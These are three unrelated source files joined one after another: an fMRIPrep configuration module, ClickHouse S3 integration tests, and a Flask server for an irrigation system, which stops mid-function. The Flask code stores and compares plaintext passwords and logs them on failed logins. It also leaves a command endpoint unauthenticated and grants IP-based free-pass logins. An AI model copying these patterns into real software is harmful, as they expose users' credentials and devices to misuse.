*fMRIPrep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = None
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = logging.getLogger("nipype.workflow")
"""NiPype's workflow logger."""
interface = logging.getLogger("nipype.interface")
"""NiPype's interface logger."""
utils = logging.getLogger("nipype.utils")
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config(
{"logging": {"log_directory": str(execution.log_dir), "log_to_file": True}}
)
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
_random_seed = None
master = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
numpy = None
"""Seed used by NumPy"""
@classmethod
def init(cls):
if cls._random_seed is not None:
cls.master = cls._random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
cls.numpy = _set_numpy_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ["ANTS_RANDOM_SEED"] = str(val)
return val
def _set_numpy_seed():
"""NumPy's random seed is independant from Python's `random` module"""
import numpy as np
val = random.randint(1, 65536)
np.random.seed(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.load(settings)
loggers.init()
def load(filename, skip=None):
"""Load settings from file."""
from toml import loads
skip = skip or {}
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
ignore = skip.get(sectionname)
section.load(configs, ignore=ignore)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
"workflow": workflow.get(),
"nipype": nipype.get(),
"seeds": seeds.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(" ") for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(Reference("MNI152NLin2009cAsym", {}))
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(Reference("MNI152NLin6Asym", {"res": "2"}))
cifti_output = workflow.cifti_output
if cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = "2" if cifti_output == "91k" else "1"
spaces.add(Reference("fsaverage", {"den": "164k"}))
spaces.add(Reference("MNI152NLin6Asym", {"res": vol_res}))
# Make the SpatialReferences object available
workflow.spaces = spaces
|
test.py
|
import json
import logging
import random
import threading
import os
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
import helpers.client
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = cluster.minio_client
minio_client.set_bucket_policy(cluster.minio_bucket, json.dumps(bucket_read_write_policy))
cluster.minio_restricted_bucket = "{}-with-auth".format(cluster.minio_bucket)
if minio_client.bucket_exists(cluster.minio_restricted_bucket):
minio_client.remove_bucket(cluster.minio_restricted_bucket)
minio_client.make_bucket(cluster.minio_restricted_bucket)
# Returns content of given S3 file as string.
def get_s3_file_content(cluster, bucket, filename):
# type: (ClickHouseCluster, str) -> str
data = cluster.minio_client.get_object(bucket, filename)
data_str = ""
for chunk in data.stream():
data_str += chunk
return data_str
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mock(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format, values)
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(cluster, bucket, filename)
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put_csv(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
def test_put_get_with_globs(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
("'wrongid','wrongkey',", False)
])
def test_multipart_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes / one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(cluster, bucket, filename)
def test_remote_host_filter(cluster):
instance = cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
"''", # 1 arguments
"'','','','','',''" # 6 arguments
])
def test_wrong_s3_syntax(cluster, s3_storage_args):
instance = cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night+nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mock(cluster):
logging.info("Starting s3 mock")
container_id = cluster.get_container_id('resolver')
current_dir = os.path.dirname(__file__)
cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mock", "mock_s3.py"), "mock_s3.py")
cluster.exec_in_container(container_id, ["python", "mock_s3.py"], detach=True)
logging.info("S3 mock started")
def test_custom_auth_headers(cluster):
ping_response = cluster.exec_in_container(cluster.get_container_id('resolver'), ["curl", "-s", "http://resolver:8080"])
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
def test_infinite_redirect(cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
|
nabucodonosor.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import subprocess
import signal
import json
import requests
import datetime as dt
import logging
import logging.config
import git
from functools import wraps
from Models import *
sys.path.insert(
1, os.path.join(os.environ["BABILONIA_LIBS"], "matricis/SmartIrrigation")
)
from SoilMoistureAnalytics import *
from TelegramAssistantServer import *
from Dashboard import *
from WaterTankManager import *
from Irrigation import *
from Watchdog import *
import simplejson as json
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from flask import (
Flask,
make_response,
Response,
url_for,
redirect,
render_template,
request,
session,
abort,
)
from flask_mqtt import Mqtt
from flask_socketio import SocketIO
from flask_assets import Environment, Bundle
# from croniter import croniter
# from flask_qrcode import QRcode
from sqlalchemy import func, and_
from flask_login import LoginManager, login_required, login_user, logout_user
from flask_caching import Cache
from threading import Thread
# from flask_executor import Executor
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.cron import CronTrigger
from about import about_system
from management import management
from monitor import monitor
###############################################################################
#################### CONFIGURATION AND INITIALISATION #########################
###############################################################################
QUARANTINE_CACHE = {}
SUPPORT_CACHE = {}
###### create console handler and set level to debug
SERVER_HOME = os.path.dirname(os.path.abspath(__file__))
LOG_DIR = os.path.join(SERVER_HOME, "../log")
COMMON_DIR = os.path.join(SERVER_HOME, "../../common")
os.chdir(SERVER_HOME) # change directory because of log files
with open(os.path.join(SERVER_HOME, "logging.json"), "r") as logging_json_file:
logging_config = json.load(logging_json_file)
if os.path.exists(LOG_DIR) == False:
os.makedirs(LOG_DIR)
logging.config.dictConfig(logging_config)
logger = logging.getLogger(__name__)
###### reading version
VERSION = subprocess.check_output(
["git", "describe", "--tags", "--always"], cwd=SERVER_HOME
).strip()
###### reading configuration
with open(os.path.join(SERVER_HOME, "config.json"), "r") as config_json_file:
cfg = json.load(config_json_file)
isMqttEnabled = cfg["MODE"]["MQTT"]
isWebEnabled = cfg["MODE"]["WEB"]
OASIS_PROP_FILE = os.path.join(COMMON_DIR, "oasis_properties.json")
with open(OASIS_PROP_FILE, "r") as oasis_prop_file:
oasis_properties = json.load(oasis_prop_file)
###### Server GPIO setup
#
# o V G o X Y o o o o o o o o o o o o o o
# o o o o o o o o o o o o o o o o o o o o
#
wtm = WaterTankManager(logger, cfg)
wtm.monitorTankLevel()
###### Initialisation
app = Flask(__name__, static_url_path="/static")
app.config["MQTT_BROKER_URL"] = cfg["MQTT"]["BROKER"]
app.config["MQTT_BROKER_PORT"] = cfg["MQTT"]["PORT"]
app.config["MQTT_KEEPALIVE"] = cfg["MQTT"]["KEEPALIVE"]
app.config["SQLALCHEMY_DATABASE_URI"] = cfg["SQLALCHEMY_DATABASE_URI"]
app.config["SQLALCHEMY_COMMIT_ON_TEARDOWN"] = True
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["SECRET_KEY"] = cfg["SECRET_KEY"]
app.config["LOGIN_DISABLED"] = cfg["LOGIN_DISABLED"]
NODE_HOME = os.path.join(os.environ["BABILONIA_HOME"], "node/ino")
ESPMAKE_PARAM = os.path.join(
os.environ["BABILONIA_LIBS"], "makeEspArduino/makeEspArduino.mk"
)
logger.info("BABILONIA_HOME: %s", os.environ["BABILONIA_HOME"])
logger.info("BABILONIA_LIBS: %s", os.environ["BABILONIA_LIBS"])
logger.info("NODE_HOME: %s", NODE_HOME)
cache = Cache(config=cfg["CACHE"])
cache.init_app(app)
# executor = Executor(app)
mqtt = Mqtt(app)
DB.init_app(app)
dashboard = Dashboard(logger, cfg)
analytics = SoilMoistureAnalytics(logger, cfg, oasis_properties)
socketio = SocketIO(app)
assets = Environment(app)
login_manager = LoginManager()
login_manager.init_app(app)
# qrcode = QRcode(app)
if cfg["TELEGRAM"]["ENABLE"]:
logger.info("[TELEGRAM_ASSISTANT] enabled")
telegram = subprocess.Popen(["python3", "TelegramAssistantServer.py"])
def stop_telegram(signum, frame):
telegram.terminate()
logger.info("[TELEGRAM_ASSISTANT] killed")
sys.exit(0)
signal.signal(signal.SIGINT, stop_telegram)
signal.signal(signal.SIGTERM, stop_telegram)
else:
logger.info("[TELEGRAM_ASSISTANT] disabled")
assets.load_path = [
os.path.join(os.path.dirname(__file__), "static/fonts"),
os.path.join(os.path.dirname(__file__), "static"),
]
assets.register(
"3rdpartycss",
"css/3rdparty/bootstrap.css",
"css/3rdparty/dataTables.bootstrap.css",
"css/3rdparty/buttons.bootstrap.css",
"css/3rdparty/select.bootstrap.css",
"css/3rdparty/sticky-footer-navbar.css",
"css/3rdparty/font-awesome.css",
"css/3rdparty/weather-icons.css",
"css/3rdparty/sweetalert.css",
"css/3rdparty/bootstrap-datepicker.css",
"css/3rdparty/bootstrap-switch.min.css",
output="assets/3rdparty.css",
filters="cssmin",
)
assets.register(
"3rdpartyjs",
"js/3rdparty/jquery-2.2.4.js",
"js/3rdparty/js.cookie.js",
"js/3rdparty/jquery-ui.js",
"js/3rdparty/jquery.dataTables.js",
"js/3rdparty/dataTables.bootstrap.js",
"js/3rdparty/dataTables.buttons.js",
"js/3rdparty/buttons.bootstrap.js",
"js/3rdparty/bootstrap-switch.min.js",
"js/3rdparty/bootstrap-datepicker.js",
"js/3rdparty/dataTables.select.js",
"js/3rdparty/popper.min.js",
"js/3rdparty/bootstrap.js",
"js/3rdparty/socket.io.min.js",
"js/3rdparty/moment.js",
"js/3rdparty/sweetalert.min.js",
# 'js/3rdparty/Chart.js',
output="assets/3rdparty.js",
filters="jsmin",
)
def update_server_software():
repo = git.Repo(os.environ["BABILONIA_HOME"])
logger.info("[update_server_software] ignoring local changes")
repo.git.reset("--hard")
logger.info("[update_server_software] geting updates")
repo.remotes.origin.pull()
logger.info("[update_server_software] restarting the service")
subprocess.check_output(["sudo", "service", "nabucodonosor", "restart"])
###############################################################################
############################# MANAGE WEB REQ/RESP #############################
###############################################################################
def check_if_gui_is_enable(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not isWebEnabled:
return render_template("misc/disabled.html")
return f(*args, **kwargs)
return decorated_function
@login_manager.user_loader
def load_user(username):
return User.query.get(username)
# somewhere to login
@app.route("/login", methods=["GET", "POST"])
@check_if_gui_is_enable
def login():
logger.info("[CLIENT IP] %s", request.remote_addr)
error = None
if cfg["FREE_PASS"]["ACTIVE"] and request.remote_addr in cfg["FREE_PASS"]["IP"]:
logger.info("[Free pass] %s", request.remote_addr)
free_pass_user = User(cfg["FREE_PASS"]["LOGIN"])
login_user(free_pass_user)
return redirect("/")
else:
logger.info("[Free pass] disabled")
if request.method == "POST":
username = request.form["username"]
password = request.form["password"]
registered_user = User.query.filter_by(
USERNAME=username, PASSWORD=password
).first()
print(registered_user)
if registered_user is None:
logger.warning(
"[Invalid Credential] username: %s password: %s", username, password
)
error = "Invalid Credentials. Please try again."
elif registered_user.USERNAME == cfg["FREE_PASS"]["LOGIN"]:
logger.warning(
"[Invalid Credential] someone else trying to use free pass user"
)
error = "Invalid Credentials. Please try again."
else:
login_user(registered_user, remember=True)
browser = request.headers.get("User-Agent")
if "Lynx" in browser:
return redirect("/about")
return redirect("/")
return render_template("login.html", error=error)
# somewhere to logout
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect("/login")
# handle page not found
@app.errorhandler(404)
def page_not_found(e):
return render_template("misc/404.html"), 404
# handle login failed
@app.errorhandler(401)
def redirect_to_login_page(e):
return redirect("/login")
def update_quarantine_cache():
with app.app_context():
QUARANTINE_CACHE.clear()
heartbeats = DB.session.query(
OasisHeartbeat.NODE_ID, OasisHeartbeat.QUARANTINE
).all()
for hb in heartbeats:
QUARANTINE_CACHE[hb.NODE_ID] = hb.QUARANTINE
logger.debug("[update_quarantine_cache] %s is %i", hb.NODE_ID, hb.QUARANTINE)
def update_support_cache():
with app.app_context():
SUPPORT_CACHE.clear()
supports = DB.session.query(
SupportData.NODE_ID, SupportData.TYPE
).all()
for support in supports:
SUPPORT_CACHE[support.NODE_ID] = support.TYPE
logger.info("[update_support_cache] %s is %s", support.NODE_ID, support.TYPE)
def get_modules_data(id):
with app.app_context():
time_start = dt.datetime.now()
if id is None:
latest = (
DB.session.query(
OasisData.NODE_ID, func.max(OasisData.TIMESTAMP).label("TIMESTAMP")
)
.group_by(OasisData.NODE_ID)
.subquery("t2")
)
modules = DB.session.query(OasisData).join(
latest,
and_(
OasisData.NODE_ID == latest.c.NODE_ID,
OasisData.TIMESTAMP == latest.c.TIMESTAMP,
),
)
else:
modules = (
DB.session.query(OasisData)
.filter(OasisData.NODE_ID == id)
.order_by(OasisData.TIMESTAMP.desc())
.limit(1)
)
time_end = dt.datetime.now()
elapsed_time = time_end - time_start
logger.debug(
"[database] call database for module page took %s secs",
elapsed_time.total_seconds(),
)
return modules
@app.route("/")
# @cache.cached()
@login_required
def index():
update_quarantine_cache()
latest_beat = (
DB.session.query(OasisHeartbeat)
.with_entities(OasisHeartbeat.LAST_UPDATE.label("LATEST_BEAT"))
.all()
)
modules = get_modules_data(None).all()
weather = dashboard.weather_currently()
raspberrypi = dashboard.raspberrypi()
nodes = dashboard.nodes(latest_beat)
farm = dashboard.farm(modules)
if cfg["WATER_TANK"]["MODE"] == "support" :
water_tank = wtm.get_current_solenoid_status_from_support()
else:
water_tank = wtm.get_current_solenoid_status()
logger.debug("[weather] %s", weather)
logger.debug("[raspberrypi] %s", raspberrypi)
logger.debug("[nodes] %s", nodes)
logger.debug("[farm] %s", farm)
logger.debug("[water_tank] %s", water_tank)
resp = make_response(
render_template(
"index.html",
weather=weather,
water_tank=water_tank,
farm=farm,
raspberrypi=raspberrypi,
nodes=nodes,
)
)
for key, value in analytics.default_param().items():
resp.set_cookie(key, str(value))
return resp
@app.route("/module", methods=["GET"])
# @cache.cached(query_string=True)
@login_required
def module():
update_quarantine_cache()
id = None
if "id" in request.args:
# example: http://localhost:8181/module?id=oasis-39732c
id = request.args["id"]
resp = make_response(
render_template("module.html", modules=get_modules_data(id), single=id)
)
for key, value in analytics.default_param().items():
resp.set_cookie(key, str(value))
return resp
@app.route("/remove", methods=["POST"])
@login_required
def node_remove():
id = request.form["NODE_ID"]
logger.debug("[remove] %s", id)
with app.app_context():
DB.session.query(OasisData).filter(OasisData.NODE_ID == id).delete()
DB.session.query(OasisHeartbeat).filter(OasisHeartbeat.NODE_ID == id).delete()
DB.session.commit()
return json.dumps({"status": "Success"})
@app.route("/configuration", methods=["POST"])
@login_required
def node_config():
id = request.form["id"]
logger.debug("[configuration] getting config for %s", id)
config = None
with app.app_context():
latest_db_config = (
DB.session.query(OasisData)
.filter(OasisData.NODE_ID == id)
.order_by(OasisData.TIMESTAMP.desc())
.first()
)
config = latest_db_config.config()
oasis_heartbeat = (
DB.session.query(OasisHeartbeat)
.filter(OasisHeartbeat.NODE_ID == id)
.first()
)
config["QUARANTINE"] = oasis_heartbeat.quarantine()
if "LIGHT" in latest_db_config.data():
config["LIGHT"] = latest_db_config.data()["LIGHT"]
else:
config["LIGHT"] = -1
if config is None:
logger.info(
"[configuration] no configuration was found in database. Getting defaults"
)
DEFAULT_CONFIG_FILE = os.path.join(COMMON_DIR, "config/oasis.json")
with open(DEFAULT_CONFIG_FILE, "r") as default_config:
config = json.load(default_config)
return json.dumps(config)
@app.route("/training", methods=["POST"])
@login_required
def training():
message = request.get_json()
analytics.feedback_online_process(message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], analytics.generate_moisture_req_msg(message))
return json.dumps({"status": "Success"})
@app.route("/reset-training", methods=["POST"])
@login_required
def reset_training():
message = request.get_json()
analytics.reset_online_process(message)
return json.dumps({"status": "Success"})
@app.route("/updatecfg", methods=["POST"])
@login_required
def updatecfg():
message = json.dumps(request.get_json())
logger.debug("[updatecfg] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
@app.route("/reset", methods=["POST"])
@login_required
def reset():
message = json.dumps(request.get_json())
logger.debug("[reset] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
@app.route("/status", methods=["POST"])
@login_required
def refresh():
message = json.dumps(request.get_json())
logger.debug("[status] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
@app.route("/command", methods=["POST"])
# @login_required
def command():
message = json.dumps(request.get_json())
logger.debug("[command] %s", message)
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
return json.dumps({"status": "Success"})
# curl -i -H "Content-Type: application/json" -X POST -d '{"COMMAND":"ligar", "DEVICE": "computador"}' http://127.0.0.1:8181/command-alexa
@app.route("/command-alexa", methods=["POST"])
@check_if_gui_is_enable
def command_alexa():
message = request.json
logger.info("[command-alexa] %s", message)
if "NODE_ID" in message:
logger.info("[command-alexa] publishing in mqtt ...")
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], message)
else:
if cfg["ALEXA"]["ENABLE"]:
logger.info("[command-alexa] customised job enable")
command = message["COMMAND"]
device = message["DEVICE"]
script = cfg["ALEXA"][command.upper()][device.upper()]
logger.info("[command-alexa] executing script %s", script)
subprocess.check_output(script)
else:
logger.info("[command-alexa] customised job disable")
return json.dumps({"status": "Success"})
@app.route("/firmware", methods=["POST"])
@login_required
def firmware_action():
message = request.get_json()
node_id = message["NODE_ID"]
action = message["ACTION"]
if action == "backup":
logger.info("[firmware-action] BACKUP %s", message)
message = {"NODE_ID": node_id, "MESSAGE_ID": "backup", "STATUS": ["NODE"]}
mqtt.publish(cfg["MQTT"]["OASIS_TOPIC_INBOUND"], json.dumps(message))
return json.dumps(
{"status": "success", "message": "backup request for " + node_id}
)
elif action == "upgrade":
logger.info("[firmware-upgrade] message=%s", message)
ESP_ADDR = "ESP_ADDR=" + message["NODE_IP"]
ota_output = subprocess.Popen(
["make", "-f", ESPMAKE_PARAM, "ota", ESP_ADDR],
cwd=NODE_HOME,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
result = str(ota_output.communicate()[0])
if "failed" in result:
# /home/msaito/github/makeEspArduino/makeEspArduino.mk:306: recipe for target 'ota' failed
return json.dumps(
{"status": "error", "message": "upgrade firmware for " + node_id}
)
return json.dumps(
{"status": "success", "message": "upgrade firmware for " + node_id}
)
elif action == "restore":
config = (
OasisData.query.filter(
OasisData.NODE_ID == node_id, OasisData.DATA["MESSAGE_ID"] == "backup"
)
